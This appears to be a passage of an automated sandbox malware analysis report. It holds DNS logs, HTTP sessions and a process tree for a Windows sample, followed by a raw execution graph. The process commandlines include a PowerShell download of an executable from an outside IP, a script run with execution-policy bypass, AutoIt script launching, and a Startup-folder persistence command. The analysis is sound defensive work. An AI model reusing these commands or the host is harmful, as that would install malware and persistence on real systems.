Dec 18, 2024 09:20:00.596944094 CET | 1.1.1.1 | 192.168.2.6 | 0xe48e | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.98 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:20:00.596944094 CET | 1.1.1.1 | 192.168.2.6 | 0xe48e | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.58.99 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:20:02.061094999 CET | 1.1.1.1 | 192.168.2.6 | 0x5a56 | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 09:20:02.061094999 CET | 1.1.1.1 | 192.168.2.6 | 0x5a56 | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 09:20:02.061094999 CET | 1.1.1.1 | 192.168.2.6 | 0x5a56 | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false

                                                                    • 139.99.188.124
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 139.99.188.124 | 80 | 1472 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 09:19:17.368194103 CET | 168 | OUT | GET /xvDYouPUJ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 139.99.188.124
Connection: Keep-Alive
Dec 18, 2024 09:19:18.869863033 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 08:19:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Tue, 03 Dec 2024 12:54:38 GMT
ETag: "da2a8-6285d2afd80b6"
Accept-Ranges: bytes
Content-Length: 893608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


                                                                    Session ID:1
                                                                    Source IP:192.168.2.6
                                                                    Source Port:49738
                                                                    Destination IP:139.99.188.124
                                                                    Destination Port:80
                                                                    PID:7496
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                                                    Timestamp:Dec 18, 2024 09:19:21.871556997 CET
                                                                    Bytes transferred:76
                                                                    Direction:OUT
                                                                    Data:
                                                                    GET /BlQMSgJx.txt HTTP/1.1
                                                                    Host: 139.99.188.124
                                                                    Connection: Keep-Alive

                                                                    Timestamp:Dec 18, 2024 09:19:23.377403021 CET
                                                                    Bytes transferred:1236
                                                                    Direction:IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 08:19:21 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                    Last-Modified: Tue, 03 Dec 2024 12:54:38 GMT
                                                                    ETag: "12f072-6285d2afd6177"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1241202
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/plain



                                                                    Target ID:1
                                                                    Start time:03:19:11
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\Desktop\PPbimZI4LV.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\PPbimZI4LV.exe"
                                                                    Imagebase:0x7ff643920000
                                                                    File size:1'083'904 bytes
                                                                    MD5 hash:A9E7A83DD50B78BAD39A2A57CBEBB137
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:03:19:12
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/xvDYouPUJ" -OutFile "C:\Users\Public\Guard.exe""
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:03:19:12
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:03:19:19
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                    Imagebase:0x7ff6e3d50000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:9
                                                                    Start time:03:19:19
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:03:19:24
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\Public\Guard.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                    Imagebase:0xf0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:13
                                                                    Start time:03:19:27
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                    Imagebase:0x1c0000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:03:19:27
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff66e660000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:15
                                                                    Start time:03:19:38
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                    Imagebase:0x7ff664500000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:03:19:40
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                    Imagebase:0xbe0000
                                                                    File size:893'608 bytes
                                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 8%, ReversingLabs
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:19
                                                                    Start time:03:19:51
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7403e0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false


                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:11%
                                                                      Total number of Nodes:1436
                                                                      Total number of Limit Nodes:41
7ff64392a7c0 98659->98662 98661->98614 98663 7ff64392a7dd memcpy_s 98662->98663 98665 7ff64392a7ed 98662->98665 98663->98661 98664 7ff64396e7da 98665->98664 98666 7ff643944c68 4 API calls 98665->98666 98666->98663 98669->98653 98670->98655 98672 7ff643929640 4 API calls 98671->98672 98673 7ff643941db2 GetVersionExW 98672->98673 98674 7ff643927cf4 4 API calls 98673->98674 98676 7ff643941dfc 98674->98676 98675 7ff64392dda4 4 API calls 98675->98676 98676->98675 98677 7ff643941e87 98676->98677 98678 7ff64392dda4 4 API calls 98677->98678 98683 7ff643941ea4 98678->98683 98679 7ff643989645 98680 7ff64398964f 98679->98680 98694 7ff6439932f4 LoadLibraryA GetProcAddress 98680->98694 98681 7ff643941f3c GetCurrentProcess IsWow64Process 98682 7ff643941f7e fread_s 98681->98682 98682->98680 98685 7ff643941f86 GetSystemInfo 98682->98685 98683->98679 98683->98681 98687 7ff6439210f1 98685->98687 98686 7ff6439896b1 98688 7ff6439896b5 98686->98688 98689 7ff6439896d7 GetSystemInfo 98686->98689 98693 7ff643944ebc 34 API calls _onexit 98687->98693 98695 7ff6439932f4 LoadLibraryA GetProcAddress 98688->98695 98690 7ff6439896bf 98689->98690 98690->98687 98692 7ff6439896f0 FreeLibrary 98690->98692 98692->98687 98693->98529 98694->98686 98695->98690 98697 7ff643927948 wcsftime 98696->98697 98698 7ff643929640 4 API calls 98697->98698 98699 7ff643927a02 98698->98699 98727 7ff643925680 98699->98727 98701 7ff643927a0c 98734 7ff643943a38 98701->98734 98705 7ff643927a2c 98750 7ff643924680 98705->98750 98707 7ff643927a3d 98708 7ff643929640 4 API calls 98707->98708 98709 7ff643927a47 98708->98709 98754 7ff64392a854 98709->98754 98712 7ff64396d05c RegQueryValueExW 98713 7ff64396d131 RegCloseKey 98712->98713 98714 7ff64396d08f 98712->98714 98717 7ff643927a83 Concurrency::wait 98713->98717 98725 7ff64396d147 wcscat Concurrency::wait 98713->98725 98715 7ff643944c68 4 API calls 98714->98715 98716 7ff64396d0b2 98715->98716 98718 7ff64396d0bf RegQueryValueExW 98716->98718 98717->98532 98719 7ff64396d0f3 
98718->98719 98722 7ff64396d112 98718->98722 98720 7ff643927cf4 4 API calls 98719->98720 98720->98722 98721 7ff643929d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98721->98725 98722->98713 98724 7ff643924680 4 API calls 98724->98725 98725->98717 98725->98721 98725->98724 98758 7ff64392ec00 98725->98758 98726->98534 98763 7ff643968f90 98727->98763 98730 7ff64392ec00 4 API calls 98731 7ff6439256b4 98730->98731 98765 7ff6439256d4 98731->98765 98733 7ff6439256c1 Concurrency::wait 98733->98701 98735 7ff643968f90 wcsftime 98734->98735 98736 7ff643943a44 GetFullPathNameW 98735->98736 98737 7ff643943a74 98736->98737 98738 7ff643927cf4 4 API calls 98737->98738 98739 7ff643927a1b 98738->98739 98740 7ff6439271f8 98739->98740 98741 7ff64392721c 98740->98741 98744 7ff64396cd0c 98740->98744 98742 7ff643927274 98741->98742 98747 7ff64396cd66 memcpy_s 98741->98747 98775 7ff64392b960 98742->98775 98746 7ff643944c68 4 API calls 98744->98746 98745 7ff643927283 memcpy_s 98745->98705 98746->98747 98748 7ff643944c68 4 API calls 98747->98748 98749 7ff64396cdda memcpy_s 98748->98749 98751 7ff64392469f 98750->98751 98753 7ff6439246c8 memcpy_s 98750->98753 98752 7ff643944c68 4 API calls 98751->98752 98752->98753 98753->98707 98755 7ff64392a87a 98754->98755 98757 7ff643927a51 RegOpenKeyExW 98754->98757 98756 7ff643944c68 4 API calls 98755->98756 98756->98757 98757->98712 98757->98717 98759 7ff64392ec1d 98758->98759 98760 7ff64397a5a2 98759->98760 98761 7ff643944c68 4 API calls 98759->98761 98762 7ff64392ec55 memcpy_s 98761->98762 98762->98725 98764 7ff64392568c GetModuleFileNameW 98763->98764 98764->98730 98766 7ff643968f90 wcsftime 98765->98766 98767 7ff6439256e9 GetFullPathNameW 98766->98767 98768 7ff64396c03a 98767->98768 98769 7ff643925712 98767->98769 98770 7ff64392a854 4 API calls 98768->98770 98771 7ff643927cf4 4 API calls 98769->98771 98772 7ff64392571c 98770->98772 98771->98772 98772->98772 98773 7ff64392dda4 4 API calls 98772->98773 98774 
7ff643925785 98773->98774 98774->98733 98776 7ff64392b981 98775->98776 98779 7ff64392b976 memcpy_s 98775->98779 98777 7ff64396ef2a 98776->98777 98778 7ff643944c68 4 API calls 98776->98778 98778->98779 98779->98745 98781 7ff643945947 GetStartupInfoW 98780->98781 98781->98424 98840 7ff64395b9bc EnterCriticalSection 98782->98840 98784 7ff6439492e4 98785 7ff64395ba10 _isindst LeaveCriticalSection 98784->98785 98786 7ff64392376e 98785->98786 98787 7ff643949334 98786->98787 98788 7ff64394933d 98787->98788 98792 7ff643923778 98787->98792 98841 7ff6439555d4 15 API calls _mbstowcs_s_l 98788->98841 98790 7ff643949342 98842 7ff64395b164 31 API calls _invalid_parameter_noinfo 98790->98842 98793 7ff6439236e8 SystemParametersInfoW SystemParametersInfoW 98792->98793 98793->98458 98795 7ff6439237cd wcsftime 98794->98795 98796 7ff643929640 4 API calls 98795->98796 98797 7ff6439237dd GetCurrentDirectoryW 98796->98797 98843 7ff6439257a0 98797->98843 98799 7ff643923807 IsDebuggerPresent 98800 7ff64396b872 MessageBoxA 98799->98800 98801 7ff643923815 98799->98801 98802 7ff64396b894 98800->98802 98801->98802 98803 7ff643923839 98801->98803 98953 7ff64392e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98802->98953 98917 7ff643923f04 98803->98917 98807 7ff6439238bf 98812 7ff64396b8dc SetCurrentDirectoryW 98807->98812 98813 7ff6439238c7 98807->98813 98808 7ff643923860 GetFullPathNameW 98809 7ff643927cf4 4 API calls 98808->98809 98810 7ff6439238a6 98809->98810 98933 7ff643923f9c 98810->98933 98812->98813 98814 7ff6439238d0 98813->98814 98954 7ff64398d540 AllocateAndInitializeSid CheckTokenMembership FreeSid 98813->98954 98949 7ff643923b84 7 API calls 98814->98949 98817 7ff64396b8f8 98817->98814 98820 7ff64396b90c 98817->98820 98822 7ff643925680 6 API calls 98820->98822 98821 7ff6439238da 98824 7ff643926258 46 API calls 98821->98824 98826 7ff6439238ef 98821->98826 98823 7ff64396b916 98822->98823 98825 7ff64392ec00 4 API calls 98823->98825 98824->98826 98828 
7ff64396b927 98825->98828 98827 7ff643923913 98826->98827 98831 7ff643925d88 Shell_NotifyIconW 98826->98831 98833 7ff64392391f SetCurrentDirectoryW 98827->98833 98829 7ff64396b94d 98828->98829 98830 7ff64396b930 98828->98830 98835 7ff6439271f8 4 API calls 98829->98835 98832 7ff6439271f8 4 API calls 98830->98832 98831->98827 98834 7ff64396b93c 98832->98834 98836 7ff643923934 Concurrency::wait 98833->98836 98955 7ff643927c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98834->98955 98838 7ff64396b963 GetForegroundWindow ShellExecuteW 98835->98838 98836->98460 98839 7ff64396b99f Concurrency::wait 98838->98839 98839->98827 98841->98790 98842->98792 98844 7ff643929640 4 API calls 98843->98844 98845 7ff6439257d7 98844->98845 98956 7ff643929bbc 98845->98956 98847 7ff6439257fe 98848 7ff643925680 6 API calls 98847->98848 98849 7ff643925812 98848->98849 98850 7ff64392ec00 4 API calls 98849->98850 98851 7ff643925823 98850->98851 98970 7ff643926460 98851->98970 98854 7ff64392584e Concurrency::wait 98858 7ff64392e0a8 4 API calls 98854->98858 98855 7ff64396c05e 99043 7ff6439a2948 98855->99043 98857 7ff64396c074 98859 7ff64392652c 63 API calls 98857->98859 98860 7ff64396c081 98857->98860 98861 7ff64392586a 98858->98861 98859->98860 99061 7ff64392652c 98860->99061 98863 7ff64392ec00 4 API calls 98861->98863 98864 7ff643925888 98863->98864 98868 7ff64396c099 98864->98868 98996 7ff64392eff8 98864->98996 98866 7ff6439258ad Concurrency::wait 98867 7ff64392ec00 4 API calls 98866->98867 98869 7ff6439258d7 98867->98869 98871 7ff643925ab4 4 API calls 98868->98871 98869->98868 98870 7ff64392eff8 46 API calls 98869->98870 98873 7ff6439258fc Concurrency::wait 98870->98873 98872 7ff64396c0e1 98871->98872 98874 7ff643925ab4 4 API calls 98872->98874 98876 7ff643929640 4 API calls 98873->98876 98875 7ff64396c103 98874->98875 98879 7ff643925680 6 API calls 98875->98879 98877 7ff64392591f 98876->98877 99009 7ff643925ab4 98877->99009 98881 
7ff64396c12b 98879->98881 98884 7ff643925ab4 4 API calls 98881->98884 98883 7ff643925941 98883->98868 98885 7ff643925949 98883->98885 98886 7ff64396c139 98884->98886 98888 7ff643948e28 wcsftime 37 API calls 98885->98888 98887 7ff64392e0a8 4 API calls 98886->98887 98889 7ff64396c14a 98887->98889 98890 7ff643925958 98888->98890 98891 7ff643925ab4 4 API calls 98889->98891 98890->98872 98892 7ff643925960 98890->98892 98893 7ff64396c15b 98891->98893 98894 7ff643948e28 wcsftime 37 API calls 98892->98894 98897 7ff64392e0a8 4 API calls 98893->98897 98895 7ff64392596f 98894->98895 98895->98875 98896 7ff643925977 98895->98896 98898 7ff643948e28 wcsftime 37 API calls 98896->98898 98899 7ff64396c172 98897->98899 98900 7ff643925986 98898->98900 98901 7ff643925ab4 4 API calls 98899->98901 98902 7ff6439259c6 98900->98902 98905 7ff643925ab4 4 API calls 98900->98905 98904 7ff64396c183 98901->98904 98902->98893 98903 7ff6439259d3 98902->98903 99032 7ff64392df90 98903->99032 98906 7ff6439259a8 98905->98906 98907 7ff64392e0a8 4 API calls 98906->98907 98909 7ff6439259b5 98907->98909 98911 7ff643925ab4 4 API calls 98909->98911 98911->98902 98913 7ff64392d670 5 API calls 98914 7ff643925a12 98913->98914 98914->98913 98915 7ff643925ab4 4 API calls 98914->98915 98916 7ff643925a60 Concurrency::wait 98914->98916 98915->98914 98916->98799 98918 7ff643923f29 wcsftime 98917->98918 98919 7ff643923f4b 98918->98919 98921 7ff64396ba2c fread_s 98918->98921 98920 7ff6439256d4 5 API calls 98919->98920 98922 7ff643923f56 98920->98922 98923 7ff64396ba4d GetOpenFileNameW 98921->98923 99405 7ff643923eb4 98922->99405 98925 7ff643923858 98923->98925 98926 7ff64396bab0 98923->98926 98925->98807 98925->98808 98928 7ff643927cf4 4 API calls 98926->98928 98930 7ff64396babc 98928->98930 98931 7ff643923f6c 99423 7ff643926394 98931->99423 98934 7ff643923fb6 wcsftime 98933->98934 99466 7ff643929734 98934->99466 98936 7ff643923fc4 98937 7ff643924050 98936->98937 99476 7ff643924d28 77 API calls 98936->99476 
98937->98807 98939 7ff643923fd3 98939->98937 99477 7ff643924b0c 79 API calls Concurrency::wait 98939->99477 98941 7ff643923fe0 98941->98937 98942 7ff643923fe8 GetFullPathNameW 98941->98942 98943 7ff643927cf4 4 API calls 98942->98943 98944 7ff643924014 98943->98944 98945 7ff643927cf4 4 API calls 98944->98945 98946 7ff643924028 98945->98946 98947 7ff64396bac2 wcscat 98946->98947 98948 7ff643927cf4 4 API calls 98946->98948 98948->98937 99481 7ff643923d90 7 API calls 98949->99481 98951 7ff6439238d5 98952 7ff643923cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98951->98952 98953->98807 98954->98817 98955->98829 98957 7ff643929be5 wcsftime 98956->98957 98958 7ff643927cf4 4 API calls 98957->98958 98959 7ff643929c1b 98957->98959 98958->98959 98969 7ff643929c4a Concurrency::wait 98959->98969 99067 7ff643929d84 98959->99067 98961 7ff643929d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98961->98969 98962 7ff643929d21 98963 7ff643929d57 Concurrency::wait 98962->98963 98964 7ff64392ec00 4 API calls 98962->98964 98963->98847 98965 7ff643929d4a 98964->98965 98967 7ff643924680 4 API calls 98965->98967 98966 7ff64392ec00 4 API calls 98966->98969 98967->98963 98968 7ff643924680 4 API calls 98968->98969 98969->98961 98969->98962 98969->98966 98969->98968 99070 7ff643926d64 98970->99070 98973 7ff64392649d 98975 7ff6439264ba FreeLibrary 98973->98975 98976 7ff6439264c0 98973->98976 98974 7ff643926d64 2 API calls 98974->98973 98975->98976 99074 7ff6439548e0 98976->99074 98979 7ff6439264db LoadLibraryExW 99093 7ff643926cc4 98979->99093 98980 7ff64396c8f6 98982 7ff64392652c 63 API calls 98980->98982 98984 7ff64396c8fe 98982->98984 98986 7ff643926cc4 3 API calls 98984->98986 98988 7ff64396c907 98986->98988 98987 7ff643926505 98987->98988 98989 7ff643926512 98987->98989 99115 7ff6439267d8 98988->99115 98991 7ff64392652c 63 API calls 98989->98991 98993 7ff643925846 98991->98993 98993->98854 98993->98855 98995 7ff64396c93f 99318 7ff643931a30 
98996->99318 98998 7ff64392f029 98999 7ff64397a7a8 98998->98999 99000 7ff64392f040 98998->99000 99334 7ff64392ee20 5 API calls Concurrency::wait 98999->99334 99003 7ff643944c68 4 API calls 99000->99003 99002 7ff64397a7bc 99004 7ff64392f066 99003->99004 99006 7ff64392f08f 99004->99006 99333 7ff64392f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99004->99333 99329 7ff64392f1bc 99006->99329 99008 7ff64392f0c6 99008->98866 99010 7ff643925ac6 99009->99010 99011 7ff643925ae4 99009->99011 99012 7ff64392e0a8 4 API calls 99010->99012 99013 7ff643927cf4 4 API calls 99011->99013 99014 7ff64392592d 99012->99014 99013->99014 99015 7ff643948e28 99014->99015 99016 7ff643948ea4 99015->99016 99017 7ff643948e3f 99015->99017 99338 7ff643948d98 35 API calls 2 library calls 99016->99338 99027 7ff643948e63 99017->99027 99336 7ff6439555d4 15 API calls _mbstowcs_s_l 99017->99336 99020 7ff643948ed6 99022 7ff643948ee2 99020->99022 99024 7ff643948ef9 99020->99024 99021 7ff643948e49 99337 7ff64395b164 31 API calls _invalid_parameter_noinfo 99021->99337 99339 7ff6439555d4 15 API calls _mbstowcs_s_l 99022->99339 99030 7ff643952c80 37 API calls wcsftime 99024->99030 99031 7ff643948ef2 99024->99031 99026 7ff643948e54 99026->98883 99027->98883 99028 7ff643948ee7 99340 7ff64395b164 31 API calls _invalid_parameter_noinfo 99028->99340 99030->99024 99031->98883 99034 7ff64392dfac 99032->99034 99033 7ff643944c68 4 API calls 99035 7ff6439259f5 99033->99035 99034->99033 99034->99035 99036 7ff64392d670 99035->99036 99037 7ff64392d698 99036->99037 99041 7ff64392d6a2 99037->99041 99341 7ff64392880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99037->99341 99040 7ff643979d43 99042 7ff64392d7de 99041->99042 99342 7ff64392ee20 5 API calls Concurrency::wait 99041->99342 99042->98914 99044 7ff6439a29c8 99043->99044 99343 7ff6439a2b70 99044->99343 99047 7ff6439a29de 99047->98857 99048 7ff6439267d8 45 API calls 99049 7ff6439a2a03 99048->99049 
99050 7ff6439267d8 45 API calls 99049->99050 99051 7ff6439a2a23 99050->99051 99052 7ff6439267d8 45 API calls 99051->99052 99053 7ff6439a2a49 99052->99053 99054 7ff6439267d8 45 API calls 99053->99054 99055 7ff6439a2a6d 99054->99055 99056 7ff6439267d8 45 API calls 99055->99056 99057 7ff6439a2ac5 99056->99057 99058 7ff6439a240c 32 API calls 99057->99058 99059 7ff6439a2ada 99058->99059 99059->99047 99348 7ff6439a1d48 99059->99348 99062 7ff643926542 99061->99062 99063 7ff64392653d 99061->99063 99065 7ff643926558 99062->99065 99066 7ff64392656f FreeLibrary 99062->99066 99064 7ff643954970 62 API calls 99063->99064 99064->99062 99065->98868 99066->99065 99068 7ff64392a7c0 4 API calls 99067->99068 99069 7ff643929d99 99068->99069 99069->98959 99071 7ff643926490 99070->99071 99072 7ff643926d74 LoadLibraryA 99070->99072 99071->98973 99071->98974 99072->99071 99073 7ff643926d89 GetProcAddress 99072->99073 99073->99071 99075 7ff6439547fc 99074->99075 99076 7ff64395482a 99075->99076 99079 7ff64395485c 99075->99079 99135 7ff6439555d4 15 API calls _mbstowcs_s_l 99076->99135 99078 7ff64395482f 99136 7ff64395b164 31 API calls _invalid_parameter_noinfo 99078->99136 99081 7ff643954862 99079->99081 99082 7ff64395486f 99079->99082 99137 7ff6439555d4 15 API calls _mbstowcs_s_l 99081->99137 99123 7ff64395feb4 99082->99123 99083 7ff6439264cf 99083->98979 99083->98980 99087 7ff643954883 99138 7ff6439555d4 15 API calls _mbstowcs_s_l 99087->99138 99088 7ff643954890 99130 7ff643960304 99088->99130 99091 7ff6439548a3 99139 7ff64394df60 LeaveCriticalSection 99091->99139 99277 7ff643926d1c 99093->99277 99096 7ff643926cf1 99097 7ff643926d0f FreeLibrary 99096->99097 99098 7ff6439264f7 99096->99098 99097->99098 99100 7ff643926580 99098->99100 99099 7ff643926d1c 2 API calls 99099->99096 99101 7ff643944c68 4 API calls 99100->99101 99102 7ff6439265b5 memcpy_s 99101->99102 99103 7ff64396c9f5 99102->99103 99104 7ff643926740 CreateStreamOnHGlobal 99102->99104 99113 7ff643926602 99102->99113 99281 
7ff6439a2e00 45 API calls 99103->99281 99106 7ff643926759 FindResourceExW 99104->99106 99104->99113 99106->99113 99107 7ff64396c97e LoadResource 99109 7ff64396c997 SizeofResource 99107->99109 99107->99113 99108 7ff6439267d8 45 API calls 99108->99113 99111 7ff64396c9ae LockResource 99109->99111 99109->99113 99110 7ff64396c9fd 99112 7ff6439267d8 45 API calls 99110->99112 99111->99113 99114 7ff6439266e8 99112->99114 99113->99107 99113->99108 99113->99110 99113->99114 99114->98987 99116 7ff64396ca6c 99115->99116 99117 7ff6439267f7 99115->99117 99282 7ff643954c5c 99117->99282 99120 7ff6439a240c 99301 7ff6439a2200 99120->99301 99122 7ff6439a2430 99122->98995 99140 7ff64395b9bc EnterCriticalSection 99123->99140 99125 7ff64395fecb 99126 7ff64395ff54 18 API calls 99125->99126 99127 7ff64395fed6 99126->99127 99128 7ff64395ba10 _isindst LeaveCriticalSection 99127->99128 99129 7ff643954879 99128->99129 99129->99087 99129->99088 99141 7ff643960040 99130->99141 99133 7ff64396035e 99133->99091 99135->99078 99136->99083 99137->99083 99138->99083 99142 7ff64396007d try_get_function 99141->99142 99142->99142 99152 7ff643960211 99142->99152 99156 7ff64394db68 37 API calls 3 library calls 99142->99156 99144 7ff6439602de 99160 7ff64395b164 31 API calls _invalid_parameter_noinfo 99144->99160 99146 7ff64396021a 99146->99133 99153 7ff643967738 99146->99153 99148 7ff643960277 99148->99152 99157 7ff64394db68 37 API calls 3 library calls 99148->99157 99150 7ff64396029a 99150->99152 99158 7ff64394db68 37 API calls 3 library calls 99150->99158 99152->99146 99159 7ff6439555d4 15 API calls _mbstowcs_s_l 99152->99159 99161 7ff643966d04 99153->99161 99156->99148 99157->99150 99158->99152 99159->99144 99160->99146 99162 7ff643966d28 99161->99162 99163 7ff643966d40 99161->99163 99215 7ff6439555d4 15 API calls _mbstowcs_s_l 99162->99215 99163->99162 99165 7ff643966d6d 99163->99165 99172 7ff643967348 99165->99172 99166 7ff643966d2d 99216 7ff64395b164 31 API calls _invalid_parameter_noinfo 99166->99216 
